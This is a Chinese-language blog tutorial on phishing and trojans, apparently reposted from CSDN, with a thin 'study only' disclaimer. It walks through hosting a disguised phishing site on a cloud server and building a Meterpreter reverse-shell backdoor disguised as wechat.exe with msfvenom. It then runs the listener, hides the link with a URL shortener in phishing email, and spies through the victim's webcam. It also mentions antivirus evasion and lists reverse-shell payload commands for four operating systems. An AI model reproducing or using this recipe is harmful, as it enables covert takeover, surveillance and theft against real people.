钓鱼与木马实践(仅供参考不可实践)

发布时间:2023年12月23日

声明:内容仅供学习,请勿违法使用,违者后果自负

一.部署云服务器

购买一台云服务器,Windows( 中文 )版本即可
华为云官网:https://www.huaweicloud.com/
登录后进入控制台

购买完成后远程登录云服务器

二.部署WEB运行环境

1.windows云服务器上下载并安装phpstudy
2.安装完之后选择:WAMP 环境,进行开启

phpstudy下载:

phpStudy_64.zip

http://8.141.81.195/NTD/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E9%92%93%E9%B1%BC%E4%B8%8E%E6%9C%A8%E9%A9%AC%E5%AE%9E%E6%88%98/media/phpstudy_64.zip

?

d43a2325b07bba7f6b21acc96e276ed6.png

?

1e4f3789f00dc5da301b1e2cd3731d3f.png

?

7e215803904ee850e1088b4170bdab25.png

?

?

0f5277da58538972d55a656979f4d411.png

?

  通过华为云服务器公网IP地址进行访问:
  在任意能够联网的设备浏览器中输入:
  http://华为云公网IP
  
  例子:
  http://124.70.93.88/

?

220df7316b046043db8868eaa44ea0b7.png

三.上传钓鱼网站代码文件,钓鱼网站伪装

?

代码文件下载,下载完成后上传到云服务器:C:\phpstudy_pro\WWW目录下,通过访问云服务器IP地址的
方式即可访问到网站页面

?

修改phpstudy配置,设置默认首页为index.html(删除index.php)

?

85ac76ca655543a1d5daf0b068abc929.png

?

?

520812643a9d2f14450d137ca7722607.png

?

?

b4d65c319b7f371f2896b2876cdafabe.png

在线生成二维码:网址二维码生成器_网址静态码活码批量在线制作_互联二维码

将公网IP放进去,转换成二维码

四.生成meterpreter后门

网站上可以放置后门程序,用户在访问时直接会进行下载,如果是Kali Linux服务器上可以使用msfvenom
和MSF工具生成并监听,Windows可以下载以下软件(运行在Windows下的MSF):

http://8.141.81.195/NTD/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E9%92%93%E9%B1%BC%E4%B8%8E%E6%9C%A8%E9%A9%AC%E5%AE%9E%E6%88%98/media/metasploitframework-latest.msi

??????metasploitframework-latest.msihttp://8.141.81.195/NTD/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E9%92%93%E9%B1%BC%E4%B8%8E%E6%9C%A8%E9%A9%AC%E5%AE%9E%E6%88%98/media/metasploitframework-latest.msi

?

?

c1657634fcc2040faa103e4ee474eeaa.png

?

下载后安装在windows云服务器中,进入到MSF bin目录下:
cmd中输入:

cd C:\metasploit-framework\bin

 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己华为云服务器的公网IP lport=
4444 -f exe -o wechat.exe 


将wechat.exe上传到云服务器web网站根目录中
用户访问 http://华为云IP/wechat.exe 即可下载后门程序(注意,用户主机需要关掉杀毒
软件与自带的病毒防御)


在华为云服务器中监听后门上线:
运行C:\metasploit-framework\bin\msfconsole.bat程序
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost 华为云公网IP
msf6 > set lport 4444
msf6 > run


生成后在华为云服务器管理界面配置安全规则 

?

?

c650da0478dda88b62b3ff7471eab80e.png

?

?

97e73ac4fa9d7a97c5f8e2e173279a1e.png

?

?

五.邮件钓鱼,链接伪装

将上一步骤的后门程序wechat.exe上传到web网站根目录(C:\phpstudy_pro\WWW)下

用户可以通过以下链接下载后门程序:
 华为云服务器公网IP/ wechat.exe

但是如果发送此链接给到用户,会较容易被识破,所以可以重新生成新链接:
访问以下网站,生成新的链接:
在线地址转换:https://www.bejson.com/convert/shorturl/

将生成的新链接,构造成钓鱼邮件发送给用户:

一些伪装技术:
exe捆绑技术

一些免杀技术:
加壳,加花指令...
网站上使用加密货币购买能够绕过杀毒软件的木马....

六.钓鱼效果验证

在华为云服务器上进入msf
输入:use exploit/multi/hancler
set payload windows/meterpreter/reverse_tcp
set lhost 华为云公网IP
set lport 4444
run

开始监听,出现meterpreter > 字样代表监听成功
后续即可进行屏幕共享,屏幕截图,监控摄像头了 
监控摄像头:
meterpreter > webcam_stream   

Firefox-latest.exe

http://8.141.81.195/NTD/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E7%9F%A5%E8%AF%86%E5%88%86%E4%BA%AB/%E9%92%93%E9%B1%BC%E4%B8%8E%E6%9C%A8%E9%A9%AC%E5%AE%9E%E6%88%98/media/firefox-latest.exe

附:Msfvenom生成不同系统后门命令

Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=你的端口 -f exe > 木马名.exe


Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=你的IP LPORT=你的端口 -f elf > 木马名


Android:
msfvenom -p android/meterpreter/reverse_tcp LHOST=你的IP LPORT=你的端口 R > 木马名.apk


MacOS:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=你的IP LPORT=你的端口 -f macho > 木马名.macho

?

?

文章来源:https://blog.csdn.net/m0_62207482/article/details/135141298
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。